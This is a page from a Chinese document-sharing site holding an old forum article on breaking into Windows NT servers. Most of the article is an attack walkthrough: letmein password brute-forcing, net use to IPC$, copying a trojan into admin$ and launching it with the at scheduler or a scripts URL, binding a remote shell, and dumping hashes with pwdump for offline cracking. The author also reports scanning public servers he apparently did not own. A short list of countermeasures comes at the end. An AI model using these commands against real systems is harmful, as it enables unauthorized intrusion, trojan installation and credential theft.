远程入侵NT.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
远程入侵NT

远程入侵NT spp(低音炮) 看了篇文章介绍使用netbus 或 netspy 远程入侵nt系统,感觉真是。。看来nt系统的共享机制如果不配合火墙使用,SMB会给你造成很大麻烦。。 连小小 只的木马都可以让nt管理员头大。 其攻击过程如下: 1、使用扫描工具查找NT主机       2 、确定攻击目标后,使用letmein 对目标主机进行攻击, 如: letmein file://x.x.x.x/ -all -g mypwd (对\\x.x.x.x上所有用户攻击) letmein file://x.x.x.x/ -admin -g mypwd (对\\x.x.x.x上管理员攻击) letmein file://x.x.x.x/ -all -d mypwd (显示\\x.x.x.x上所有用户) 注:- 确定目标后,收集目标信息并尝试取得非法资源 3、当letmein 获取相关管理员权限后,使用ms提供的合法命令: net use \\x.x.x.x\ipc$ pass/user:user 连接远程资源并将木马拷入远程 copy x:\netserver.exe \\x.x.x.x\admin$\system32 4、使用合法ms命令远程启动木马服务: netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 该方法有其巧妙之处。。利用nt的任务计划管理,在特定时候启动木马服务 另一种方法: 将ntsrver.exe 或其他运行程序Copy到目的服务器的www可执行目录, 如cgi-bin或scripts,然后在浏览器键入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木马服务将被启动 到此,该次攻击可以算成功了,远程资源已在别人控制下。 如果在远程使用app redirect 启动一个cmd.exe到特定端口 , 那么你可以telnet 到该端口,更方便使用该远程资源 。比如:使用pwdump 将远程nt上所有用户和密码 dump成文件,回传本地,使用其他工具如l0phtcrack来运算。 分析该次攻击的整体过程,不难看出,关键步骤是letmein取得admin权限,但是很不幸,就目前厦门(有些是省内)的nt服务器管理员而言,密码对letmein只是多花几分钟而已。我对某些大的公共平台服务器进行扫描的结果,除了solaris和linux系统之外,其余的nt被letmein猜中率有75%以上。而且在这些被进入的机器上,SMB都有在tcp/ip上 跑,有两台有配备火墙,但是没有封闭对外137-139口。 对策: 1、还是老话,密码的选择问题,使用向..@2KjsfiM7v!09..这样的密码会让任何使用 暴力法计算的机器算到cpu烧掉。 2、nt网络的适当配置,不要在对外的nc绑定共享服务是个好习惯,特别是tcp/ip协议。 3、防火墙的配置,屏蔽一切不需要的服务端口,象netebui在tcp/ip上的137-139口,开这些口只会使你的系统处于危险的处境,如果非要在远程使用这些口的服务,建议使用其他软件来代替。 4、及时检查日记和监控服务的运行,定时对文件系统的权限受托关系进行检查。 5、管理人员素质的提高,安全风险意思加强无疑对你管理的系统有很多好处。 -- SPP 10Hz的低频 你听不到的声音却无时不刻在影响着你 。 黑客技术 破解密码、Scanner 、Windows和Nt 、Sniffer 、再议 Sniffer ARP 、欺骗技术  尽一年没来了,发现帐号还在,嘻嘻。。。挺好。 看了这版的文章,觉得有些想法,好象大家对网上安全的问题看法差别很大,有些好象还觉得网上真的很安全,呵呵。。所以想有时间分几次谈谈自己的看法,不过想先举个例子,就学校的网络系统而言,用10秒的时间,你可以看到什么? 我看到的是这样的: 2= 3= 4= 7= 8=JingX 5= = = 5 5= 6 ok.那么这些又代表什么呢? 看看bbs--3吧,再用10秒。 Port 13 found. Desc=daytime Port 9 found. Desc=discard Port 19 found. Desc=chargen Port 21 found. Desc=ftp ^^^ 可能有东东的。 请参考CERT coordination C

文档评论(0)

xxj1658888 + 关注
实名认证
文档贡献者

教师资格证持证人

该用户很懒,什么也没介绍

领域认证该用户于2024年04月12日上传了教师资格证

1亿VIP精品文档

相关文档